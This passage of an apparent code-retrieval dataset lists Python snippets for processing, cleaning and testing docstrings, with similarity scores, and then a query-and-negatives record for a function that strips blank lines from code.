(Note: this rewriting affects only the documentation\n # comments inside classes & methods, not the actual method signatures.)\n\n docstring = docstring.replace(r'const char *', 'string ')\n docstring = docstring.replace(r'const char* ', 'string ')\n docstring = docstring.replace(r'an unsigned int', 'a long integer')\n docstring = docstring.replace(r'unsigned int', 'long')\n docstring = docstring.replace(r'const std::string&', 'string')\n docstring = docstring.replace(r'const std::string &', 'string ')\n docstring = docstring.replace(r'const std::string', 'string')\n docstring = docstring.replace(r'std::string', 'string')\n docstring = docstring.replace(r'const ', '')\n docstring = docstring.replace(r'NULL', 'null')\n docstring = docstring.replace(r'boolean', 'bool')\n\n # Use C# syntax instead of \"const XMLNode*\" etc.\n\n p = re.compile(r'const (%?)(' + r')( ?)(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRefAddingSpace, docstring) \n p = re.compile(r'(%?)(' + r')( ?)(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRefAddingSpace, docstring) \n\n # <code> has its own special meaning in C#; we have to turn our input\n # file's uses of <code> into <c>. Conversely, we have to turn our\n # uses of verbatim to <code>.\n\n p = re.compile(r'<code>(.+?)</code>', re.DOTALL)\n docstring = p.sub(r'<c>\\1</c>', docstring)\n p = re.compile('@verbatim(.+?)@endverbatim', re.DOTALL)\n docstring = p.sub(r'<code>\\1</code>', docstring)\n\n # Do replacements on some documentation text we sometimes use.\n\n p = re.compile(r'antimonyConstants([@.])')\n docstring = p.sub(r'antimonycs.antimony\\1', docstring)\n\n # Fix @link for constants that we forgot conditionalize in the source.\n\n p = re.compile(r'@link +([A-Z_0-9]+?)@endlink', re.DOTALL)\n docstring = p.sub(r'@link antimony.\\1@endlink', docstring)\n\n # Can't use math symbols. 
Kluge around it.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '>=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '<=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '*', docstring)\n\n # Some additional special cases.\n\n docstring = docstring.replace(r'SBML_formulaToString()', 'antimonycs.antimony.formulaToString()')\n docstring = docstring.replace(r'SBML_parseFormula()', 'antimonycs.antimony.parseFormula()')\n\n # Need to escape the quotation marks:\n\n docstring = docstring.replace('\"', \"'\")\n docstring = docstring.replace(r\"'\", r\"\\'\") \n\n return docstring", "def _add_doc(func, doc):\n func.__doc__ = doc", "def undocumented(func):\n func._undocumented_ = True\n return func", "def docstring(self, docstring): # type: (str) -> None\n self._tmp_docstring = inspect.cleandoc(docstring)", "def extract_docstring(loaded):\n\n source = loaded['cells'][0]['source']\n\n assert source[0].strip() == '\"\"\"'\n assert source[-1].strip() == '\"\"\"'\n\n return ' '.join(i.strip() for i in source[1:-1])", "def __doc__(self, ???):", "def func_doc():", "def collect_docstring(lines):\n lines = dropwhile(lambda x: not x.startswith('\"\"\"'), lines)\n doc = \"\"\n for line in lines:\n doc += line\n if doc.endswith('\"\"\"\\n'):\n break\n\n return doc[3:-4].replace(\"\\r\", \"\").replace(\"\\n\", \" \")", "def old_function_with_docstring(x, y):\n return x + y", "def clean_docs(c):\n c.run(f\"rm -fr {DOCS_BUILD_DIR}\")", "def convert_doxygen_docstring(lines, name):\n\n lines = lines[:]\n newlines = []\n indent = 0\n reading_desc = False\n\n while lines:\n line = lines.pop(0)\n if line.startswith(\"////\"):\n continue\n\n line = line.rstrip()\n if line.startswith('///<'):\n strline = line[4:]\n else:\n strline = line\n\n strline = strline.lstrip('/ \\t')\n\n if strline == \"**\" or strline == \"*/\":\n continue\n\n if strline.startswith(\"** \"):\n strline = strline[3:]\n elif strline.startswith(\"* \"):\n strline = strline[2:]\n elif strline == \"*\":\n strline = \"\"\n\n strline = strline.lstrip(' \\t')\n\n if strline.startswith('@'):\n special = strline.split(' ', 1)[0][1:]\n if special == 'par' and strline.endswith(':') and lines and '@code' in lines[0]:\n newlines.append(' '*indent + strline[5:] + ':')\n newlines.append('')\n line = lines.pop(0)\n offset = line.index('@code')\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"verbatim\" or special == \"code\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. code-block:: guess')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"f[\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. 
math::')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@f]' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == 'param':\n #TODO\n #if extra is not None:\n # _, name, desc = strline.split(' ', 2)\n # extra['param:' + name] = desc\n continue\n elif special == 'deprecated':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n\n # I'd love to use the proper Sphinx deprecated tag, but it\n # requires a version number, whereas Doxygen doesn't.\n newlines.append('*Deprecated:* ' + convert_doxygen_format(value, name))\n newlines.append('')\n continue\n elif special in ('brief', 'return', 'returns'):\n #TODO\n #if extra is not None:\n # _, value = strline.split(' ', 1)\n # extra[special] = value\n continue\n elif special == 'details':\n strline = strline[9:]\n elif special == 'sa' or special == 'see':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n values = value.split(',')\n\n for i, value in enumerate(values):\n result = resolve_reference(value.partition('(')[0], name)\n if result:\n values[i] = ':{0}:`{1}`'.format(*result)\n else:\n values[i] = ':obj:`{0}`'.format(value)\n\n if special == 'see':\n newlines.append('See {}.'.format(', '.join(values)))\n else:\n newlines.append('See also {}.'.format(', '.join(values)))\n newlines.append('')\n continue\n elif special in ('note', 'warning'):\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. %s:: ' % (special))\n newlines.append('')\n newlines.append(' ' + convert_doxygen_format(strline[2 + len(special):], name))\n while lines and lines[0].strip(' *\\t/'):\n line = lines.pop(0).lstrip(' *\\t')\n newlines.append(' ' + convert_doxygen_format(line, name))\n\n newlines.append('')\n continue\n elif special == 'since':\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. versionadded:: ' + strline[7:])\n newlines.append('')\n continue\n else:\n print(\"Unhandled documentation tag: @\" + special)\n\n if strline or len(newlines) > 0:\n newlines.append(' '*indent + convert_doxygen_format(strline, name))\n\n return newlines", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def docstring(\n docstring: str = None, *, pre: str = None, post: str = None\n) -> Callable[[U], U]:\n\n def edit_docstring(obj: U) -> U:\n obj.__doc__ = \"\".join(\n (\n clean_docstring(pre or \"\", unused=\"pre\"),\n clean_docstring(docstring or (obj.__doc__ or \"\")),\n clean_docstring(post or \"\", unused=\"post\"),\n )\n )\n return obj\n\n return edit_docstring", "def doc_summary(lines):\n summary = []\n for line in lines:\n stripped = line.strip().lower()\n if (stripped.startswith('to use this normalizer') or\n stripped.startswith('use ``method')):\n continue\n if (line.startswith('Parameters') or line.startswith('Example')\n or line.startswith('.. 
note::')):\n break\n summary.append(line)\n return summary", "def docstring(func):\n try:\n lines = func.__doc__.strip().split(\"\\n\")\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def test_doc():\n pass", "def inherits_doc():\n pass", "def test_user_func_docstrings(self):\n for func in self.user_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def get_main_help(self):\r\n return __doc__.strip()", "def test_user_func_docstrings(self):\n for func in self.student_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def doc_apply(doc):\n\n def wrapper(func):\n func.__doc__ = doc\n return func\n\n return wrapper", "async def remove_doc(self, *args, **kwargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. 
This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def pydocstyle(context):\n exec_cmd = \"pydocstyle .\"\n run_cmd(context, exec_cmd)", "def getdoc(object):\r\n try:\r\n doc = object.__doc__\r\n except AttributeError:\r\n return None\r\n if not isinstance(doc, types.StringTypes):\r\n return None\r\n return cleandoc(doc)", "def task_pydocstyle():\n yield {\n 'name': os.path.join(os.getcwd(), 'nikola'),\n 'actions': [\"pydocstyle --count --match-dir='(?!^\\\\.)(?!data).*' nikola/\"],\n }", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def inheritdocstrings(cls):\n for name, func in vars(cls).items():\n if isinstance(func, types.FunctionType) and not func.__doc__:\n for parent in cls.__bases__:\n parfunc = getattr(parent, name, None)\n if parfunc and getattr(parfunc, '__doc__', None):\n func.__doc__ = parfunc.__doc__\n break\n return cls", "def rewriteDocstringForPython (docstring):\n\n # Take out the C++ comment start and end.\n\n docstring = docstring.replace('/**', '').replace('*/', '')\n p = re.compile('^(\\s*)\\*([ \\t]*)', re.MULTILINE)\n docstring = p.sub(r'\\2', docstring)\n\n # Rewrite some of the data type references to equivalent Python types.\n # (Note: this rewriting affects only the documentation comments inside\n # classes & methods, not the method signatures.)\n\n docstring = docstring.replace(r'const char *', 'string ')\n docstring = docstring.replace(r'const char* ', 'string ')\n docstring = docstring.replace(r'an unsigned int', 'a long integer')\n docstring = docstring.replace(r'unsigned int', 'long')\n docstring = docstring.replace(r'const std::string&', 'string')\n docstring = docstring.replace(r'const std::string', 'string')\n docstring = docstring.replace(r'std::string', 'string')\n docstring = docstring.replace(r'NULL', 'None')\n docstring = docstring.replace(r'@c true', '@c True')\n docstring = docstring.replace(r'@c false', '@c False')\n\n # Also use Python syntax instead of \"const XMLNode*\" etc.\n\n p = re.compile(r'const (%?)(' + r') ?(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRef, docstring) \n p = re.compile(r'(%?)(' + r') ?(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRef, docstring) \n\n # Need to escape the quotation marks:\n\n docstring = docstring.replace('\"', \"'\")\n docstring = docstring.replace(r\"'\", r\"\\'\")\n\n # Python method cross-references won't be made by doxygen unless\n # the method reference is written without arguments.\n\n p = re.compile('(\\s+)(\\S+?)::(\\w+\\s*)(\\([^)]*?\\))', re.MULTILINE)\n docstring = p.sub(translatePythonCrossRef, docstring)\n p = re.compile('(@see\\s+)(\\w+\\s*)(\\([^)]*?\\))')\n docstring = p.sub(translatePythonSeeRef, docstring)\n\n # Friggin' doxygen escapes HTML character codes, so the hack we have to\n # do for Javadoc turns out doesn't work for the Python documentation.\n # Kluge around it.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '>=', docstring)\n 
docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '<=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '*', docstring)\n\n # SWIG does some bizarre truncation of leading characters that\n # happens to hit us because of how we have to format verbatim's.\n # This tries to kluge around it: \n p = re.compile('@verbatim.+?@endverbatim', re.DOTALL)\n docstring = p.sub(indentVerbatimForPython, docstring)\n\n return docstring", "def trim(docstring):\n if not docstring:\n return ''\n # Convert tabs to spaces (following the normal Python rules)\n # and split into a list of lines:\n lines = six.u(docstring).expandtabs().splitlines()\n lines = [line.strip() for line in lines]\n res = six.u('\\n').join(lines)\n return res", "def test_0_check_xc_docstring(self):\n self.banner(\"Checking the docstring on your extra credit.\") \n filename = self.find_file('project9_xc.py')\n self.check_docstring(filename)", "def _remove_doc(xml_str):\n result = []\n do_add = True\n for line in xml_str.splitlines():\n if '<doc:doc>' in line:\n do_add = False\n if do_add:\n result.append(line)\n if '</doc:doc>' in line:\n do_add = True\n return '\\n'.join(result)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def copy_docstring(other):\n\n def wrapper(func):\n func.__doc__ = other.__doc__\n return func\n\n return wrapper", "def _clean_doc(doc: Dict) -> Dict:\n doc['label'] = doc['labels'][config.LANG]['value']\n aliases = doc['aliases'][config.LANG] if config.LANG in doc['aliases'] else []\n\n doc['aliases'] = [alias['value'] for alias in aliases]\n\n for key in DOC_CLEAN_KEYS:\n try:\n del doc[key]\n except:\n continue\n return doc", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def remove_stopwords_fun(self):\n tokens = str(self.doc).split()\n cleaned_tokens = [token for token in tokens\n if token.lower() not in self.stopword_list]\n self.doc = ' '.join(cleaned_tokens)", "def filter_doc(doc_text):\n # remove stars\n filter_regex=re.compile(r\"[_*]\")\n doc=filter_regex.sub(\"\",doc_text)\n # substitute quotation marks\n double_quot_regex=re.compile(r\"[“”]\")\n single_quot_regex=re.compile(r\"[’‘]\")\n doc=double_quot_regex.sub('\"',doc)\n doc=single_quot_regex.sub(\"'\",doc)\n # substitute new lines inside the text for spaces\n # these new lines are usually caused by formatting texts to fit in 80 columns \n newline_quot_regex=re.compile(r\"(\\S)\\n(\\S)\")\n doc=newline_quot_regex.sub(r\"\\1 \\2\",doc)\n # remove illustration tag\n #illustration_regex=re.compile(r\"\\[Illustration.*]\")\n #doc=illustration_regex.sub(\"\",doc)\n return doc", "def docs():", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def improve_class_docstring(app, cls, lines):\n if issubclass(cls, models.Model):\n improve_model_docstring(app, cls, lines)\n elif issubclass(cls, forms.BaseForm):\n improve_form_docstring(cls, lines)", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def test_fs_func_docstrings(self):\n for func in self.fs_f:\n 
self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def strip_docstrings(tokens):\n stack = []\n state = 'wait_string'\n for t in tokens:\n typ = t[0]\n if state == 'wait_string':\n if typ in (tokenize.NL, tokenize.COMMENT):\n yield t\n elif typ in (tokenize.DEDENT, tokenize.INDENT, tokenize.STRING):\n stack.append(t)\n elif typ == tokenize.NEWLINE:\n stack.append(t)\n start_line, end_line = stack[0][2][0], stack[-1][3][0]+1\n for i in range(start_line, end_line):\n yield tokenize.NL, '\\n', (i, 0), (i,1), '\\n'\n for t in stack:\n if t[0] in (tokenize.DEDENT, tokenize.INDENT):\n yield t[0], t[1], (i+1, t[2][1]), (i+1, t[3][1]), t[4]\n del stack[:]\n else:\n stack.append(t)\n for t in stack: yield t\n del stack[:]\n state = 'wait_newline'\n elif state == 'wait_newline':\n if typ == tokenize.NEWLINE:\n state = 'wait_string'\n yield t", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def update_docstring(instance):\n try:\n docstring = instance.api_map['doc']\n except (KeyError, TypeError):\n docstring = 'No docstring provided.'\n\n instance.__class__.__doc__ = docstring\n instance.__class__.__call__.__signature__ = construct_signature(instance)\n\n return docstring", "def main():\n system('cls||clear')\n\n #Print a docstring.\n print (main.__doc__)", "def def_textface_doctests():", "def test_dbs_func_docstrings(self):\n for func in self.dbs_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def test_dbs_func_docstrings(self):\n for func in self.dbs_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def init_doc(self):\n raise NotImplementedError()", "def minimize_source(source):\n if not isinstance(source, mitogen.core.UnicodeType):\n source = source.decode('utf-8')\n tokens = tokenize.generate_tokens(StringIO(source).readline)\n tokens = strip_comments(tokens)\n tokens = strip_docstrings(tokens)\n tokens = reindent(tokens)\n return tokenize.untokenize(tokens)", "def strip_params_from_docstring(docstring):\n split_lines 
= trim_docstring(docstring).split('\\n')\n\n cut_off = None\n for index, line in enumerate(split_lines):\n line = line.strip()\n if PARAMS_PATTERN.search(line):\n cut_off = index\n break\n if cut_off is not None:\n split_lines = split_lines[0:cut_off]\n\n return \"\\n\".join(split_lines)", "def trim_docstring(docstring):\r\n lines = docstring.expandtabs().splitlines()\r\n\r\n # Find minimum indentation of any non-blank lines after first line.\r\n from sys import maxint\r\n margin = maxint\r\n for line in lines[1:]:\r\n content = len(line.lstrip())\r\n if content:\r\n indent = len(line) - content\r\n margin = min(margin, indent)\r\n\r\n # Remove indentation.\r\n if lines:\r\n lines[0] = lines[0].lstrip()\r\n if margin < maxint:\r\n for i in range(1, len(lines)):\r\n lines[i] = lines[i][margin:]\r\n\r\n # Remove any trailing or leading blank lines.\r\n while lines and not lines[-1]:\r\n lines.pop()\r\n while lines and not lines[0]:\r\n lines.pop(0)\r\n return '\\n'.join(lines)", "def short_doc(obj):\n if obj.__doc__:\n lines = obj.__doc__.strip(' \\n').splitlines()\n if lines:\n return lines[0]\n return None", "def test_all_docstrings():\n functions = inspect.getmembers(s7, inspect.isfunction)\n for func in functions:\n docstring = func[1].__doc__\n assert docstring, \"Wooaaahhh !! You have not written docstring for {}\".format(func[1].__str__())", "def consistent_documentation():\n\n return 3", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def docstring(func: Callable) -> list[str] | None:\n try:\n lines = func.__doc__.strip().split(\"\\n\") # type: ignore\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def test__get_doc():\n docstring = util._get_doc(\"midgard\")\n assert isinstance(docstring, str) and len(docstring) > 0", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def guess(cls, docstring):", "def getdoc(obj):\n try:\n doc = obj.__doc__\n except AttributeError:\n return None\n if not isinstance(doc, str):\n return None\n return inspect.cleandoc(doc)", "def parse_help(func):\n # Grab the raw doc\n doc = func.__doc__\n\n # Check for non-existent documentation and return a 404 message of sorts\n if not doc:\n return 'Woops, there isn\\'t any documentation for this command!'\n\n # Strip away extra newlines\n doc = doc.strip()\n # Split on (and remove) the newlines\n doc = doc.split('\\n')\n # Clean out the leading space on each line, merge the lines, and return\n return ' '.join(L.strip() for L in doc)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def remove_code_annotations(line_to_transform):\n line_to_transform = str(line_to_transform)\n line_to_transform = line_to_transform.split(' #', 1)[0]\n line_to_transform = line_to_transform.replace(':', '')\n line_to_transform = line_to_transform.replace('\\t', '')\n line_to_transform = line_to_transform.replace(' ', '')\n line_to_transform = line_to_transform.replace('\\n', '')\n line_to_transform = line_to_transform.replace('elif ', '')\n line_to_transform = line_to_transform.replace('if ', '')\n line_to_transform = line_to_transform.replace('else ', '')\n line_to_transform = line_to_transform.replace('else', '')\n line_to_transform = line_to_transform.replace('def ', '')\n line_to_transform = line_to_transform.replace('for ', '')\n line_to_transform = 
line_to_transform.replace('while ', '')\n return line_to_transform", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def strip_yaml_from_docstring(docstring):\n split_lines = trim_docstring(docstring).split('\\n')\n\n cut_off = None\n for index in range(len(split_lines) - 1, -1, -1):\n line = split_lines[index]\n line = line.strip()\n if line == '---':\n cut_off = index\n break\n if cut_off is not None:\n split_lines = split_lines[0:cut_off]\n\n return \"\\n\".join(split_lines)", "def _docs_params(**kwds):\n\n def dec(obj):\n obj.__orig_doc__ = obj.__doc__\n obj.__doc__ = dedent(obj.__doc__).format_map(kwds)\n return obj\n\n return dec", "def doc_sub(*sub):\n def dec(obj):\n obj.__doc__ = obj.__doc__.format(*sub)\n return obj\n return dec", "def test_doc_fun(self):\n for fun in self.functions:\n self.assertTrue(len(fun.__doc__) > 0)", "def md_docstring(docstring):\n content = []\n lines = textwrap.dedent(docstring).splitlines()\n content.append(md_escape(lines[0]))\n lines = lines[1:]\n while lines and (not lines[0] or lines[0].isspace()):\n lines = lines[1:]\n\n if not all(l.isspace() for l in lines):\n content.append(md_code('\\n'.join(lines), language=None))\n content.append('')\n return content", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def triple_quote_docs():\n return", "def parse_docs(docs):\n if not docs:\n return __name__, \"<no documentation>\"\n docs = docs.strip().split('\\n')\n for i, line in enumerate(docs):\n docs[i] = line.strip()\n return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else \"<no documentation>\"", "def _removeComments(code):\r\n # remove all occurance streamed comments (/*COMMENT */) from string\r\n text = re.sub(re.compile('/\\*.*?\\*/', re.DOTALL), '', code)\r\n # remove all occurance singleline comments (//COMMENT\\n ) from string\r\n return re.sub(re.compile('//.*?\\n'), '', text)" ]
[ "0.7418431", "0.70061356", "0.69807357", "0.697398", "0.692769", "0.6822503", "0.6774257", "0.6732609", "0.66039276", "0.64539397", "0.6381781", "0.63537943", "0.6343105", "0.62978303", "0.6271671", "0.6246473", "0.6230828", "0.6230828", "0.6230828", "0.62265724", "0.6169188", "0.61584216", "0.6123759", "0.61000675", "0.607402", "0.60697144", "0.6050962", "0.6045161", "0.602112", "0.60190713", "0.6000477", "0.59981334", "0.5997999", "0.5989179", "0.5969329", "0.59518117", "0.59124297", "0.59091175", "0.58889985", "0.5876472", "0.5872568", "0.5838108", "0.58369", "0.5830149", "0.5825831", "0.5819563", "0.58111316", "0.5798315", "0.57952166", "0.5790616", "0.578703", "0.5748159", "0.5742749", "0.57301575", "0.57301325", "0.5724095", "0.5721791", "0.57179177", "0.56983334", "0.5687046", "0.567928", "0.56737536", "0.5670126", "0.56648546", "0.5659203", "0.5641394", "0.56410813", "0.5626655", "0.5623831", "0.561544", "0.56063354", "0.5595017", "0.55932885", "0.55932885", "0.55906975", "0.5588577", "0.5586489", "0.5581303", "0.55726993", "0.5571934", "0.55643046", "0.5560398", "0.5556693", "0.5551825", "0.554143", "0.5533265", "0.5530116", "0.55292815", "0.55271244", "0.55241954", "0.5521923", "0.5502516", "0.5499995", "0.54983217", "0.5493006", "0.548639", "0.5469594", "0.54665834", "0.5465206", "0.5458908" ]
0.67054003
8
Strips blank lines from the code
def strip_blanklines(blob):\n    lines = blob.split('\n')\n    return '\n'.join([line for line in lines if line.strip() != ''])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_blank_lines(text):\n out_text = \"\"\n blank = True\n for line in text.splitlines(True):\n if line.isspace():\n if not blank:\n blank = True\n out_text = out_text + line\n else:\n blank = False\n out_text = out_text + line\n return out_text", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def remove_empty_lines(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n self.result_code = open(\"result.c\",\"w\") #Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line is empty.\n if line != \"\\n\":\n self.result_code.write(line) # Writing the non-empty line onto the intermediate file.\n self.result_code.close() # Closing the intermediate file.", "def remove_leading_whitespace_and_empty_lines(text: str) -> str:\n # We call lstrip() twice on the same line. This is inefficient but ok for small unit tests.\n # Please change it if you want to.\n return '\\n'.join([line.lstrip() for line in text.split('\\n') if line.lstrip() != ''])", "def _strip_lines(lines):\n for line in lines:\n stripped = line.strip()\n if stripped:\n yield stripped", "def _preprocess(self, source):\n source = source.replace(u'\\n', u'').strip()\n source = re.sub(r'<br\\s*\\/?\\s*>', u' ', source, re.I)\n source = re.sub(r'\\s\\s+', u' ', source)\n return source", "def no_blank_line_before_section(): # noqa: D416", "def remove_leading_blanks(self, sentence):\n pass", "def _remove_beginning_newlines(lines):\n first_non_blank_line = 0\n\n for line in lines:\n if line.strip():\n break\n\n first_non_blank_line += 1\n\n return lines[first_non_blank_line:]", "def cleanup_code(self, content):\n\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n if content[-4] == '\\n':\n return '\\n'.join(content.split('\\n')[1:-1])\n return '\\n'.join(content.split('\\n')[1:]).rstrip('`')\n\n # remove `foo`\n return content.strip('` \\n')", "def ignorableWhitespace(self, data):\n pass", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def skipWhiteSpace(self):\n pass", "def stripText(self, rawText):\n strippedText = []\n for line in rawText:\n if line.rstrip():\n if line[0] != '#':\n strippedText.append(line.rstrip()) #also remove newline character\n return strippedText", "def clean_lines(lines):\n _lines = []\n for l in lines:\n l = l.strip().rstrip()\n if len(l) > 0:\n _lines.append(l)\n return _lines", "def __stripEol(self, txt):\n return txt.replace(\"\\r\", \"\").replace(\"\\n\", \"\")", "def cleaned_contents(self):\n snip_with_code = 
re.compile(\"(//.*snip(\\-file)*:?.*\\n)(\\+\\n)?(\\[.*\\]\\n)*----\\n(.*\\n)*?----\\n\", flags=re.IGNORECASE)\n cleaned = re.sub(snip_with_code, r'\\1', self.contents)\n return cleaned", "def emptyline(self):", "def contents_without_whitespace(self):\n return self.contents.replace(' ', '').replace('\\n', '')", "def _get_cleaned_script(self, script):\n script = self._add_uuids(script)\n splitted_script = script.split('\\n')\n code_lines = []\n for line in splitted_script:\n if line.strip() != '':\n code_lines.append(line)\n for i, line in enumerate(code_lines):\n if line[0] != '\\t' and line[0] != ' ':\n code_lines[i] = '\\n' + line\n script = '\\n'.join(code_lines) + '\\n'\n return script", "def _strip(lines: Sequence[str]) -> Sequence[str]:\n lines = [i.rstrip() for i in lines]\n return lines", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove 